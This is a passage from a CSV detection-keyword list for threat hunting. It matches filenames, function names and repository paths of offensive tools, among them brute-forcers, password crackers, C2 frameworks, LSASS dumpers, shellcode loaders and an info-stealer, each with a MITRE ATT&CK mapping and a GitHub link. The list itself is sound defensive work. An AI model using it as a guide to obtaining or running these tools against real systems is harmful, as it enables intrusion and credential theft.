set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*WmiSploit-master/zip*",".{0,1000}WmiSploit\-master\/zip.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation 
tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*WNFarmDynamite_h.cs*",".{0,1000}WNFarmDynamite_h\.cs.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*word_gen_b_varlen.*",".{0,1000}word_gen_b_varlen\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*word_unc_injector.*",".{0,1000}word_unc_injector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Wordlist/ftp_p.txt*",".{0,1000}Wordlist\/ftp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ftp_u.txt*",".{0,1000}Wordlist\/ftp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ftp_up.txt*",".{0,1000}Wordlist\/ftp_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/mssql_up.txt*",".{0,1000}Wordlist\/mssql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/mysql_up.txt*",".{0,1000}Wordlist\/mysql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" 
"*Wordlist/oracle_up.txt*",".{0,1000}Wordlist\/oracle_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/pass.txt*",".{0,1000}Wordlist\/pass\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/pop_p.txt*",".{0,1000}Wordlist\/pop_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/pop_u.txt*",".{0,1000}Wordlist\/pop_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/postgres_up.txt*",".{0,1000}Wordlist\/postgres_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/smtp_p.txt*",".{0,1000}Wordlist\/smtp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/smtp_u.txt*",".{0,1000}Wordlist\/smtp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack 
tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/snmp.txt*",".{0,1000}Wordlist\/snmp\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/sql_p.txt*",".{0,1000}Wordlist\/sql_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/sql_u.txt*",".{0,1000}Wordlist\/sql_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ssh_p.txt*",".{0,1000}Wordlist\/ssh_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ssh_u.txt*",".{0,1000}Wordlist\/ssh_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ssh_up.txt*",".{0,1000}Wordlist\/ssh_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" 
"*Wordlist/telnet_p.txt*",".{0,1000}Wordlist\/telnet_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/telnet_u.txt*",".{0,1000}Wordlist\/telnet_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/telnet_up.txt*",".{0,1000}Wordlist\/telnet_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/user.txt*",".{0,1000}Wordlist\/user\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/vnc_p.txt*",".{0,1000}Wordlist\/vnc_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/windows_u.txt*",".{0,1000}Wordlist\/windows_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/windows_up.txt*",".{0,1000}Wordlist\/windows_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack 
tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*wordlist_TLAs.txt*",".{0,1000}wordlist_TLAs\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--wordlist=*-passwords.txt*",".{0,1000}\-\-wordlist\=.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*wordlist-nthash-reversed*",".{0,1000}wordlist\-nthash\-reversed.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*wordlist-probable.txt*",".{0,1000}wordlist\-probable\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wordlists*all_in_one.7z*",".{0,1000}wordlists.{0,1000}all_in_one\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*wordlists*rmg.txt*",".{0,1000}wordlists.{0,1000}rmg\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*wordlists*rmiscout.txt*",".{0,1000}wordlists.{0,1000}rmiscout\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*wordlists/dynamic-all.txt*",".{0,1000}wordlists\/dynamic\-all\.txt.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*wordlists/fasttrack.txt*",".{0,1000}wordlists\/fasttrack\.txt.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*wordlists/rockyou.txt'*",".{0,1000}wordlists\/rockyou\.txt\'.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*wordlists/subdomains-5000.txt*",".{0,1000}wordlists\/subdomains\-5000\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*wordlists/top1million.txt*",".{0,1000}wordlists\/top1million\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" 
"*WorldWind Stealer.zip*",".{0,1000}WorldWind\sStealer\.zip.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","14","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" "*WorldWind-Stealer*",".{0,1000}WorldWind\-Stealer.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","14","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" "*wpapcap2john.*",".{0,1000}wpapcap2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*wp-exploitable-plugins.txt*",".{0,1000}wp\-exploitable\-plugins\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wpscan ?url*",".{0,1000}wpscan\s\?url.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","0","N/A","N/A","10","8243","1236","2024-04-25T16:50:24Z","2012-07-11T20:27:47Z" "*wpscan --api-token *",".{0,1000}wpscan\s\-\-api\-token\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wpscanteam/wpscan*",".{0,1000}wpscanteam\/wpscan.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","8243","1236","2024-04-25T16:50:24Z","2012-07-11T20:27:47Z" "*Wr173F0rF113(*",".{0,1000}Wr173F0rF113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Wra7h/SingleDose*",".{0,1000}Wra7h\/SingleDose.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*wraith-labs/wraith*",".{0,1000}wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*wrap_execute_assembly*",".{0,1000}wrap_execute_assembly.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_execute_encoded_powershell*",".{0,1000}wrap_execute_encoded_powershell.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" 
"*wrap_get_clipboard*",".{0,1000}wrap_get_clipboard.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_inject_shellc*",".{0,1000}wrap_inject_shellc.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_load_memfd*",".{0,1000}wrap_load_memfd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_unhook_ntdll*",".{0,1000}wrap_unhook_ntdll.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Write Dll buffer into remote 
memory*",".{0,1000}Write\sDll\sbuffer\sinto\sremote\smemory.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*write_cs_teamserver*",".{0,1000}write_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*write_payload_dll_transacted*",".{0,1000}write_payload_dll_transacted.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*write_what_where.py*",".{0,1000}write_what_where\.py.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","243","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*WriteAndExecuteShellcode*",".{0,1000}WriteAndExecuteShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*WriteDLLPermission.txt*",".{0,1000}WriteDLLPermission\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
